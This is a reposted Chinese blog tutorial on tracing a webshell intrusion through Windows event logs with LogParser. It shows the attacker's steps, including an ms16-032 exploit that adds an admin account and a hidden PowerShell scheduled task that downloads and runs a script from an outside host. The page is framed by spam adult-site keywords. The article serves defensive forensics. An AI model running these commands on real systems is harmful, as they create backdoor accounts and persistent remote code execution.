成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

在Windows日志里發現入侵痕跡

系統 Windows
有小伙伴問:Windows系統日志分析大多都只是對惡意登錄事件進行分析的案例,可以通過系統日志找到其他入侵痕跡嗎?

 [[358556]]

本文轉載自微信公眾號「Bypass」,作者Bypass。轉載本文請聯系Bypass公眾號。

有小伙伴問:Windows系統日志分析大多都只是對惡意登錄事件進行分析的案例,可以通過系統日志找到其他入侵痕跡嗎?

答案肯定是可以的,當攻擊者獲取webshell后,會通過各種方式來執行系統命令。所有的web攻擊行為會存留在web訪問日志里,而執行操作系統命令的行為也會存在在系統日志。

不同的攻擊場景會留下不一樣的系統日志痕跡,不同的Event ID代表了不同的意義,需要重點關注一些事件ID,來分析攻擊者在系統中留下的攻擊痕跡。

我們通過一個攻擊案例來進行windows日志分析,從日志里識別出攻擊場景,發現惡意程序執行痕跡,甚至還原攻擊者的行為軌跡。

1、信息收集

攻擊者在獲取webshell權限后,會嘗試查詢當前用戶權限,收集系統版本和補丁信息,用來輔助權限提升。

  1. whoami 
  2. systeminfo 

Windows日志分析:

在本地安全策略中,需開啟審核進程跟蹤,可以跟蹤進程創建/終止。關鍵進程跟蹤事件和說明,如:

  1. 4688 創建新進程 
  2. 4689 進程終止 

我們通過LogParser做一個簡單的篩選,得到Event ID 4688,也就是創建新進程的列表,可以發現用戶Bypass,先后調用cmd執行whami和systeminfo。Conhost.exe進程主要是為命令行程序(cmd.exe)提供圖形子系統等功能支持。

  1. LogParser.exe  -i:EVT "SELECT TimeGenerated,EventID,EXTRACT_TOKEN(Strings,1,'|')  as UserName,EXTRACT_TOKEN(Strings,5,'|')  as ProcessName FROM c:\11.evtx where EventID=4688" 

2、權限提升

通過執行exp來提升權限,獲取操作系統system權限,增加管理用戶。

  1. ms16-032.exe "whoami" 
  2. ms16-032.exe "net user test1 abc123! /add" 
  3. ms16-032.exe "net localgroup Administrators test1 /add" 

Windows日志分析:

在本地安全策略中,需開啟審核賬戶管理,關鍵賬戶管理事件和說明。如:

  1. 4720 創建用戶 
  2.  
  3. 4732 已將成員添加到啟用安全性的本地組 

這里會涉及進程創建,主要關注賬戶創建和管理用戶組變更。從Event ID 4720 ,系統新建了一個test用戶,從Event ID 4732的兩條記錄變化,得到一個關鍵信息,本地用戶test從user組提升到Administrators。

3、管理賬號登錄

在創建管理賬戶后,嘗試遠程登錄到目標主機,獲取敏感信息。

  1. mstsc /v 10.1.1.188 

Windows日志分析:

在本地安全策略中,需開啟審核登錄事件,關鍵登錄事件和說明,如:

  1. 4624 登錄成功 
  2. 4625 登錄失敗 

  1. LogParser.exe -i:EVT "SELECT TimeGenerated as LoginTime,EXTRACT_TOKEN(Strings,8,'|') as EventType,EXTRACT_TOKEN(Strings,5,'|') as username,EXTRACT_TOKEN(Strings,18,'|') as Loginip FROM C:\3333.evtx where EventID=4624" 

使用LogParser做一下分析,得到系統登錄時間,登錄類型10 也就是遠程登錄,登錄用戶 test,登錄IP:10.1.1.1。

4、權限維持

通過創建計劃任務執行腳本后門,以便下次直接進入,使用以下命令可以一鍵實現:

  1. schtasks /create /sc minute /mo 1 /tn "Security Script" /tr "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\"\"\"http://10.1.1.1:8888/logo.txt\"\"\"))\"" 

Windows日志分析:

在本地安全策略中,需開啟審核對象訪問,關鍵對象訪問事件,如:

  1. 4698 創建計劃任務 
  2.  
  3. 4699 刪除計劃任務 

這里涉及進程創建和對象訪問事件,包括schtasks.exe進程的創建和Event ID 4698發現新建的計劃任務。成功找到計劃任務后門位置:

 

責任編輯:武曉燕 來源: Bypass
相關推薦

2011-03-07 17:52:51

2017-03-29 14:42:23

Windows 7Windows上網痕跡

2011-11-21 17:20:02

DCOM錯誤日志

2010-03-26 16:16:55

Windows 7

2013-08-29 10:26:27

windows系統防火防火墻

2011-11-21 16:35:46

2021-04-19 08:02:54

Windows手工入侵

2012-05-14 13:16:24

WindowsARM

2011-04-27 09:55:07

2011-03-15 15:41:43

2011-03-15 14:31:32

2010-05-07 11:22:18

Unix操作系統

2009-10-15 09:55:48

2020-08-18 16:21:36

安全黑客攝像機

2010-09-09 11:34:10

2011-03-15 16:03:06

2010-09-17 17:10:43

Windows后門

2022-04-06 10:34:09

Linux元數據

2009-12-16 15:43:44

2009-12-23 15:41:26

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 人人cao| 欧美精品在线一区 | 午夜精品久久久久久久99黑人 | 激情在线视频 | 国产精品欧美一区二区三区不卡 | 超碰伊人| 在线国产一区二区 | 成人在线免费视频 | 夜久久 | 精品福利在线 | 国产一区二区精品在线观看 | 四虎影院免费在线播放 | 嫩草视频免费 | 亚洲一区二区三区观看 | 不卡一区二区三区四区 | 久久久123 | 国产欧美日韩视频 | 精品一区二区在线观看 | 久久免费高清 | 欧美国产大片 | www.夜夜草 | 欧美精品1区2区 | 欧美黄色片 | 国产乱码精品一区二区三区中文 | 国产成人福利 | 国产一区二区在线播放 | 欧美福利一区 | 亚洲精品欧美精品 | 色在线看 | 偷拍第一页 | 国产欧美一区二区精品久导航 | 香蕉久久网 | 国产美女一区二区 | 久久久青草婷婷精品综合日韩 | 亚洲每日更新 | 久草在线青青草 | 亭亭五月激情 | 日本视频免费 | 性色av一区二区三区 | 99精品国产在热久久 | 欧美韩一区二区三区 |